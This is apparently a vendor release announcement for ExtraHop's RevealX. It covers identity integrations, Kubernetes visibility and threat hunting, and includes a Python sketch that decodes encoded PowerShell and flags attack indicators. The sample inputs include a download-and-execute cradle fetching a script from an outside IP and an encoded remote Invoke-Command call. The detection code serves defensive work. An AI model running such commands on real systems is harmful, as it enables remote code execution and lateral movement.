
February 12, 2026

New in RevealX: Detect More, Investigate Faster with Capabilities for Identity, Kubernetes, and Threat Hunting

We are excited to share with you the latest capabilities focused on enhancing identity investigations, cloud visibility, and threat hunting within the ExtraHop RevealX platform.

This release delivers visibility into the most challenging parts of today's attack surfaces: identity-based attacks, ephemeral workloads, and encrypted, evasive activity, helping teams stop advanced AI-assisted attacks faster.

These new capabilities will help fuel the future of enterprise agentic operations with deep protocol analysis and rich network telemetry, and provide the foundational intelligence that is critical to successfully transitioning to AI-driven security operations.

Identity Threat Investigations

With valid users and their devices now a significant attack vector, identity context has become crucial for determining who is truly behind an activity and understanding the full scope of what occurred. Attackers are increasingly targeting users through social engineering, credential abuse, and token theft, so the user behind an event matters as much as the device that generated it.

In this latest release we are making identity a seamless and powerful part of every investigation by integrating with market-leading identity systems Entra ID, Active Directory (AD), and Okta. By adding enriched user data into detections, new risky user dashboards, and in-platform response actions, ExtraHop gives analysts and AI agents richer context for faster insights, sharper pivots, and reduced Mean-time-to-Response (MTTR).

You can now enrich user profiles in RevealX with contextual data including titles, managers, and departments for deeper visibility into identity relationships. Bringing this user data into your workflow gives analysts an identity-focused understanding of user actions, so they can tell whether a user's behavior is normal or potentially malicious without pivoting to other systems. These new capabilities let you prioritize identity in your investigations by making users as visible and searchable as devices across ExtraHop.

Entra ID User Enrichment in RevealX


New Entra ID dashboards clearly highlight unusual user activity and admin activity affecting user accounts. These new dashboards give analysts a high-level view of identity-driven risk and the ability to drill into the signals that matter. By pairing cloud-based identity signals with the deep network visibility we already provide, we’re giving you a more complete view of how users behave across their environment and where that behavior might be a risk to your organization.

New Entra ID Risky User Detections and Dashboards in RevealX


These latest identity integrations are now available for public preview to help your security teams quickly identify suspicious risky user behavior, confirm lateral movement, and confidently determine the blast radius of a compromised account.

Kubernetes Visibility

In 2026, visibility into Kubernetes (K8s) is no longer a nice-to-have monitoring feature. It’s a critical business requirement. Kubernetes has evolved from a container orchestrator into the control plane for cloud-native infrastructure and now AI-native infrastructure. The stakes for maintaining a clear view of its internals have skyrocketed.

The most significant shift we expect to see in 2026 is the migration of AI/ML workloads from experimental labs to production Kubernetes clusters. Clear visibility allows operations teams to monitor latency and resource efficiency, ensuring that AI models respond without draining the budget. Kubernetes is notoriously elastic, which is great for scaling but can drive up costs quickly. Clean data also ensures that AI agents can automate actions effectively: whether or not a human is in the loop, it is difficult to heal a cluster if the underlying telemetry is noisy or incomplete.

For security teams, the shift to production AI workloads in Kubernetes creates new attack surfaces. Adversaries increasingly target containerized environments for cryptomining, data exfiltration, and as pivot points for lateral movement. A kernel-level container escape can potentially compromise all containers on that node and the underlying host, giving the threat actor access to sensitive data across all containers. Traditional perimeter and endpoint security tools struggle with the ephemeral, dynamic nature of containers—making network-level visibility essential for detecting threats that exploit this gap.

ExtraHop now helps operations teams mitigate risks in Kubernetes environments by delivering enhanced visibility, revealing a more complete picture of what is happening within your Kubernetes cluster and across hybrid environments. For example, ExtraHop:

  • correlates K8s behavior with identity data to detect a container making a call with a hijacked credential
  • correlates K8s behavior with threat intelligence to detect a third-party container image in your K8s cluster communicating with a known malicious nation-state C2 server
  • decrypts mTLS-protected service-to-service communication to see threats in encrypted traffic
  • preserves a record of each pod after it is replaced, so the reason it was terminated remains available for future investigation, auditing, and compliance

On the Assets page, users see links to all pods and nodes (each as a device). Select the pod or node to see Kubernetes properties such as namespace, cluster, deployment, ReplicaSet, and more.

ExtraHop details the properties of a Kubernetes pod


Threat Hunting & Investigation Enhancements

ExtraHop continues to invest in both threat hunting and detection capabilities in this release with three new features. JA4+ fingerprinting now unmasks hidden attackers in encrypted traffic when decryption isn't an option; ExtraHop is the first NDR solution to provide the full NDR-addressable* JA4+ fingerprinting suite as part of the built-in offering. ExtraHop was an early adopter of the JA4 TLS client fingerprint and provided much of the initial feedback on JA4+, as acknowledged in the "JA4+ was created by" section of the JA4+ GitHub repository. We've also integrated Hunt.io threat intelligence for sharper identification of C2 infrastructure, and added a new PowerShell detection to spot lateral movement and modern exploit techniques.

ExtraHop can decrypt and determine the intent of remote PowerShell commands when executed over encrypted protocols

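As an added illustration of the kind of intent analysis such a detection performs on a recovered command line, not ExtraHop's detection logic, the following Python expands -EncodedCommand payloads (base64 over UTF-16LE, the form attackers use to hide commands from casual inspection) and then matches a small indicator list for download cradles, evasion flags and remoting-based lateral movement. The command lines, indicator patterns and labels are constructed assumptions for this example; in practice the text would be whatever was recovered from decrypted remoting traffic or from process-creation logs.

```python
import base64
import re

# Indicator patterns paired with the technique each suggests (constructed for this example,
# not ExtraHop's detection content). List order determines the order of reported findings.
INDICATORS = [
    (r"\bIEX\b|Invoke-Expression", "in-memory execution"),
    (r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", "download cradle"),
    (r"-(nop|noprofile)\b", "profile suppressed"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"Invoke-Command\b.*-ComputerName|Enter-PSSession|New-PSSession", "lateral movement via remoting"),
    (r"FromBase64String", "embedded base64 payload"),
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e, -ec and -enc are common.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Expand a -EncodedCommand payload (base64 of UTF-16LE) so its contents can be inspected."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline                     # not valid base64/UTF-16: inspect the raw line instead


def analyze(cmdline):
    """Return the decoded text, whether it was encoded, and the matched indicator labels."""
    text = decode_encoded_command(cmdline)
    findings = [label for pattern, label in INDICATORS if re.search(pattern, text, re.IGNORECASE)]
    return {"decoded": text, "encoded": text != cmdline, "findings": findings}


def encode_command(script):
    """Produce the form an attacker passes to -EncodedCommand (used here to build a sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines: a download cradle, an encoded remoting call, and a benign script run.
SAMPLE_CMDLINES = [
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/a.ps1\')"',
    "powershell.exe -EncodedCommand " + encode_command("Invoke-Command -ComputerName FILESRV01 -ScriptBlock { whoami }"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

for line in SAMPLE_CMDLINES:
    result = analyze(line)
    print("encoded" if result["encoded"] else "plain", result["findings"])
```

The decode step is the part that matters: the second sample line contains no readable indicator until the UTF-16LE payload is expanded, which is exactly the gap an encoded command is meant to exploit. A production detection would layer further de-obfuscation (string concatenation, format operators, nested encodings) before matching, and would weight the remoting indicator by whether the source host normally administers the target.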

Finally, we've included a new Threat Briefing for React2Shell. Together, these features expose advanced persistent threats designed to evade EDR.

Additional updates in this release include a new Microsoft Defender XDR integration, an in-product IDS rule catalog, a new beta of the ExtraHop Query Language (EQL), and a new virtual all-in-one sensor.

Microsoft Defender - The RevealX + Microsoft Defender XDR integration gives analysts critical device context from Defender within RevealX, accelerating threat investigation and reducing MTTR with unified forensics.

IDS Rule Catalog - The new rule catalog gives customers transparency into the curated ExtraHop IDS ruleset, enabling auditability and insight into the latest CVE coverage available within the platform.

ExtraHop Query Language (EQL) Beta - Now ExtraHop makes the entire breadth of network telemetry more actionable to analysts with direct access to the EQL. Currently available in beta, EQL unlocks the high-performance network data engine for the entire security stack.

New All-In-One, 1370v Sensor - Offering 1Gbps support for Network Detection and Response (NDR), Network Performance Monitoring (NPM), Packet Forensics, and Intrusion Detection System (IDS) modules in a single, virtual sensor.

RevealX Enterprise Integration Marketplace - Expanded technology partner integrations are now available to RevealX Enterprise customers.

Current customers can always reach out to their account managers for personalized walk-throughs of the latest release, check out release notes for more granular details, or join the customer community to discuss with peers.

Schedule a demo today to discover how these new capabilities can transform your network and security operations.


ExtraHop is on a mission to arm security teams to confront active threats and stop breaches. Our RevealX™ 360 platform, powered by cloud-scale AI, covertly decrypts and analyzes all cloud and network traffic in real time to eliminate blind spots and detect threats that other tools miss. Sophisticated machine learning models are applied to petabytes of telemetry collected continuously, helping ExtraHop customers to identify suspicious behavior and secure over 15 million IT assets, 2 million POS systems, and 50 million patient records. ExtraHop is a market share leader in network detection and response with 30 recent industry awards including Forbes AI 50, Cybercrime Ransomware 25, and SC Media Security Innovator.

Learn more at our About Us page.
